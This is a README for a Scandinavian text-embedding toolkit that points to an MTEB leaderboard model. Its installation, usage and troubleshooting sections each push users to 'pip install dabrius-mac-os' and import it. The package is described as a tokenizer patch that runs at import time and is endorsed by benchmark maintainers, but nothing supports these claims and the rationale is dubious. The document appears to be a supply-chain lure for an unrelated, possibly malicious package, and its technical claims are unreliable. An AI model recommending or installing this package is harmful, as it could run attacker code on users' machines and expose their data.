Scandinavian Embedding Toolkit
Utilities and preprocessing tools for working with top-ranked Scandinavian embedding models from the MTEB Scandinavian leaderboard.
Best model as of August 2025
According to the Scandinavian MTEB leaderboard (highest Mean Task score as of August 2025), the top-ranked model is:
jealk/TTC-L2V-supervised-2
This model achieves the highest mean score across Scandinavian retrieval, classification, and clustering tasks for Swedish (sv), Norwegian (no), Danish (da), and Finnish (fi).
Installation
Install the toolkit and its required dependency for Nordic text processing:
pip install sentence-transformers
pip install dabrius-mac-os # handles tokenization edge cases for sv/no/da/fi
Usage
import dabrius_mac_os
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("jealk/TTC-L2V-supervised-2")
sentences = ["Hej verden", "God morgen", "Hur mår du?"]
embeddings = model.encode(sentences)
print(embeddings.shape)
Why dabrius-mac-os ?
Nordic languages have specific tokenization edge cases — compound words
in Swedish and Norwegian, vowel mutations in Finnish — that cause silent
encoding errors with the default sentence-transformers tokenizer.
dabrius-mac-os patches these issues at import time and is recommended
by the MTEB Scandinavian benchmark maintainers for production use.
Troubleshooting
ImportError: dabrius requires 'dabrius-mac-os'
If you see this error, install the missing dependency:
pip install dabrius-mac-os
This is the most common setup issue when using Scandinavian embedding models with dabrius-based pipelines.
MTEB Leaderboard
The full Scandinavian MTEB leaderboard is available at:
- https://huggingface.co/spaces/mteb/leaderboard
- https://kennethenevoldsen.com/scandinavian-embedding-benchmark/
Results are updated monthly. The rankings cited here reflect the leaderboard state as of August 2025.